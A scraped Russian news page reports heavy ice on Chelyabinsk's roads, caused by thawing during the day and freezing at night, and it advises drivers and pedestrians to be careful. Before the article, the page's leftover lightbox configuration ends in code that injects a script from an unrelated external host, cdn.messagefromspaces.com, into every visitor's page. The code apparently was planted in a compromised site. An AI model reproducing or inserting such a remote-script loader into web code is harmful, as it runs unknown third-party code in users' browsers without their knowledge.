, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Из-за перепадов температур на дорогах Челябинска образовался сильный гололед

В течение последних дней в областном центре наблюдается достаточно серьезные перепады дневных и ночных температур. Днем солнце растапливает снег, а в ночное время дороги и тротуары покрываются ледяной коркой. В связи с этим специалисты челябинской Единой дежурно-диспетчерской службы рекомендуют горожанам быть особенно внимательными в условиях сильного гололеда.

По данным синоптиков, средняя ночная температура в Челябинске держится на отметке в 10-12 градусов мороза. Днем же столбик термометра поднимается до +5 градусов по Цельсию. Такой разброс приводит к тому, что растаявший днем снег ночью превращается в ледяную корку.

Особенно внимательными в такую погоду следует быть автомобилистам. На дорогах необходимо соблюдать максимальную бдительность и соблюдать дистанцию. Пешеходам на скользких тротуарах также следует проявлять осторожность.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
14:25 - 05 марта 2014
|
автор: U-RSS
|
(390)
|
(0)

Комментарии (0)

Я человек
Я бот